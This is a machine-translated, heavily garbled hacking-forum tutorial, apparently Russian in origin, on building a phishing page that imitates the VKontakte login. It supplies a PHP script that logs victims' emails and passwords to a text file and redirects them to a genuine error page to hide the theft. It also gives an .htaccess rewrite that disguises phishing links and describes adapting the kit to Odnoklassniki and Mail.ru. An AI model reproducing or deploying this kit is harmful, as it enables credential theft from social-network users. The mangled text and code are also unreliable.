This page has been robot translated, sorry for typos if any. Original content here.

Gefälschte Peitsche

[INTRO]

Es war nechago, es war Nacht .... In der Tat auf meinem ersten Artikel (zuerst auf antichate), zog mich durch die Tatsache , dass auf einer Haupt unter Kauf / Verkauf / Tausch / wirft , ist das Thema , in das man Hecker prodovat fakie bereits auf VSW 10, und werden oft gefragt, die eine oder andere Fälschung zu schaffen ...
Ich sage Ihnen einen Artikel wie möglich zabatsat Universal-Fälschung unter fast allen ugondo! Ich zeige ein Beispiel Faika vkontakte.

[Searching]

Und so ein , dass wir tun müssen , ist wählen zhertvoresurs und sammeln alles , was wir Informationen benötigt, und wir brauchen nur einige stranits.Idem auf vkontakte.ru durch Operu kopieren (!). Zhmyakaem Tasteneingabe, erhalten wir auf login.php, und es als Index unserer Fälschungen nehmen. Klicken Sie in der Oper: Datei -> Speichern unter -> im Dialogfeld wählen , betitelt (die Standardeinstellung ist Webarchiv ....) „HTML FILE imaging“ und ausgelassen den Spaltennamen der Datei Schreibindex (oder login.htm - abhängig von der Seite)


Weiter unrealistische Daten einzuführen und auf die Seite zu bekommen, auf dem es geschrieben
Diese E-Mail-Adresse ist nicht registriert, oder ein falsches Passwort.
Bewahren Sie es auf die gleiche Art und Weise, das heißt nly Index anstelle schlecht zu schreiben.
Ferner Weitere Ergebnisse aus vkontakte.ru »und Ischim etwas zu tun mit erorom Kontakt versuchen , in Google.ru Vkontakte.ru Eis zu fahren, klicken Sie auf ... fand ich auf VKontakte vtoryo Seite | Fehler (http://vkontakte.ru/blank.php?code=10)- erinnern wir brauchen diesen Link
Schnurrbart, alles, was wir für die Fälschungen von der Ressource benötigen, haben wir bereits.

[Kodierung]

Tux isleduem jetzt Formular anmelden. Öffnen Sie Ihre index.html und suchen Sie nach dem Login-Formular.
 <Form method = "post" name = "login" id = "login" action = "login.php">

  <Input type = "hidden" name = "success_url" id = "success_url" value = "">
  <Input type = "hidden" name = "fail_url" id = "fail_url" value = "">

  <Input type = "hidden" name = "try_to_login" id = "try_to_login" value = "1">
  <Tabelle align = "center" cellpadding = 0 Cellspacing = 7 border = 0 width = "40%">

  <Tr>
  <Td width = "100px">
  <Span class = "gray"> E-Mail: </ span>
  </ Td>
  <Td>

  <Input class = "input" type = "text" name = "email" value = "" id = "email" size = "25" />

  <Td>
  </ Tr>
  <Tr>
  <Td>
  <Span class = "gray"> Kennwort: </ span>

  </ Td>
  <Td>
  <Input class = "input" type = "password" name = "pass" value = "" id = "pass" size = "25" />

  </ Td>
  </ Tr>
 
  <Tr>
  <Td>
  & Nbsp;
  </ Td>
  <Td>

  <Input style = "margin-top: 1px; vertical-align: middle;"  type = "checkbox" name = "verfallen" id = "verfallen" value = "1" /> <small> Erinnert mich nicht </ small>

  </ Td>
  </ Tr>
  <Tr>
  <Td>
  & Nbsp;
  </ Td>
  <Td>
erinnern Daher 3 Dinge:
<Form method = "post" name = "login" id = "login" action = "login.php">
<Input class = "input" type = "text" name = "email" value = "" id = "email" size = "25" />
<Input class = "input" type = "password" name = "pass" value = "" id = "pass" size = " 25" />
Es ist in diesen 3 Dingen ersten Teil der Einzigartigkeit im sozialen Bereich oder einer E-Mail oder woanders zaklyuchaetsya, überall Anmeldeformular (Feld) in der VD sein wird (auch nur die Felder Name weckt variieren), zum Beispiel von Mitschülern ist
<Input id = "field_password" value = "" style = "width: 170px;" type = "Passwort" size = "20" name = "st.password">
Dh nur otlichaetsya Namensfelder, Design-Elemente, aber die Funktion ist ein und dasselbe.
Nun erstellen wir eine PHP - Datei und nennen Sie es zum Beispiel login.php, dessen Inhalt:

PHP - Code:
  <? Php
 

/ *
#############
# By_NoNameZ #
###########
* /
$ F = fopen ( "log.txt" , "at");
Herd ($ f, 2);
if (preg_match ( „/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/ i“, $ _POST [ 'E - Mail ']) &&! empty ($ _POST [ 'password'])) {
fputs ($ f, $ _POST [ 'email']. ";". $ _POST [ 'password'] "\ n".);
Header ( "Location: http: // ");
} Else {
Header ( "Location: http: // ");
}
flock ($ f, 3);
fclose ($ f);
?>
Eigentlich sehen Sie die Schrift, ein paar strocheg, aber es ist ganz normal, fake, seine Funktionalität:
Speichern übertragenen Variablen, deren Prüfung, umleiten, je nach dem Test.

So jetzt zurück zu den drei Linien:
<Form method = "post" name = "login" id = "login" action = "login.php">
wir hier alles in Ordnung, sovpodaet der Name des Skripts ihren Namen, nobyvaet, die nicht, passt dann es uns ersetzen oder pereiminovyvaem.
<Input class = "input" type = "text" name = "email" value = "" id = "email" size = "25" />
<Input class = "input" type = "password" name = "pass" value = "" id = "pass" size = "25" />
Daher müssen wir = „E - Mail“ und name = „pass“ nennen
Wir stellen sie in unserem Skript an der richtigen Stelle
  <? Php
 

/ *
#############
# By_NoNameZ #
###########
* /
$ F = fopen ( "log.txt" , "at");
Herd ($ f, 2);
if (preg_match ( „/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/ i“, $ _POST [ 'E - Mail ']) &&! empty ($ _POST [ 'pass'])) {
fputs ($ f, $ _POST [ 'E - Mail']. ";". $ _POST [ 'pass'] "\ n".);
Header ( "Location: http: // ");
} Else {
Header ( "Location: http: // ");
}
flock ($ f, 3);
fclose ($ f);
?>
Wer nicht bemerkt hat, ist es $ _POST [ 'E - Mail'] und $ _POST [ 'pass']

Schauen Sie sich das Knarren, dann Stait Funktion IF ELSE und pregmatch, dh wenn das Feld die E-Mail E-Mail erfüllt (ника@мыло.ру, und nicht als Lead yvpmdvgk) und das Passwort-Feld nicht leer ist, dann wird die erste Umleitung durchgeführt wird, wenn die E-Mail nicht entspricht oder geben Feld leer, dann die zweite Umleitung. Daraus folgt, dass , wenn Chell Seife und etwas gebracht ähnlich passieren, werfen Sie es dann auf der Seite erorom http://vkontakte.ru/blank.php?code=10, und wenn der Müll (hier eingeführt und wir brauchten bad.html Seite kopieren? wenn wir die falschen Daten eingegeben), dann werfen sie es zurück, das heißt, wir bad.htm eingeben.

PHP - Code:
  <? Php
 

/ *
#############
# By_NoNameZ #
###########
* /
$ F = fopen ( "log.txt" , "at");
Herd ($ f, 2);
if (preg_match ( „/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/ i“, $ _POST [ 'E - Mail ']) &&! empty ($ _POST [ 'pass'])) {
fputs ($ f, $ _POST [ 'E - Mail']. ";". $ _POST [ 'pass'] "\ n".);
header ( "Location: http://vkontakte.ru/blank.php?code=10") ;
} Else {
header ( "Location: bad.htm") ;
}
flock ($ f, 3);
fclose ($ f);
?>
Sohranyaem.Zalivaem alle Labuda Server (login.php, index.htm + Datei - Ordner, bad.htm + Dateiordner) erstellen fayil log.txt (Ich rate Ihnen , mit einem eindeutigen Namen zu kommen. Vergessen Sie nicht , um das Skript zu ändern), setzen Sie auf er chmod777.

3) ein kleines Update ...

Dieses Update ist sehr geeignet für SI schaffen Ausfallen .htaccess mit folgendem Inhalt ist im Wesentlichen auf der ftp:

RewriteEngine On
RewriteCond% {REQUEST_FILENAME}! -f
RewriteCond% {REQUEST_URI}! Index \ .htm
RewriteRule (. *) Index.htm? [QSA]

ACHTUNG !!!
! Index \ .htm -on Fail ssylaetsya umleiten, wenn Sie gefälschte login.html sagen. dementsprechend müssen Sie pereiminovat Index um sich einzuloggen.

Tux, das Ausfallen gibt uns mehr Qualität Link gazliva, und zwar:
vashfeyk.ru / ein beliebiger Text, Link - Struktur tobish sogdavaemogo fake, zum Beispiel Kontakt zu wissen, was wir tun können , um:


vashfeyk.ru / photos.php? act = Show & id = 15884695_588954334 & uid = 359648756 & self = 6
und die provisorische Regierung ist durch ICQ))) zustimmen. jetzt weniger auffällig fake))

Das ist alles

[Ende] Eigentlich ist das einzigartig, und die Tatsache, dass Sie zu den Mitschülern gehen können, nur die Seite speichern, geben Sie eine Variable, ersetzen URLs (das ist nur http://odnoklassniki.ru/dk?st.cmd=error geben) und alles nur obsolyutno gehen zu mayil.ru, Retain-Variablen und ersetzen alle))) das einzige, was Sie brauchen können, ist Kreativität, dobustim nicht die Homepage speichern und die Seite vhoda.Vy können auch jedes Forum machen, wenn Sie die aCC lassen wollen ( Bitte senden Sie eine PM
<a href="feyk"> Link auf </a>
Und in gefälschten geben Sie den Betreff für die Umleitung.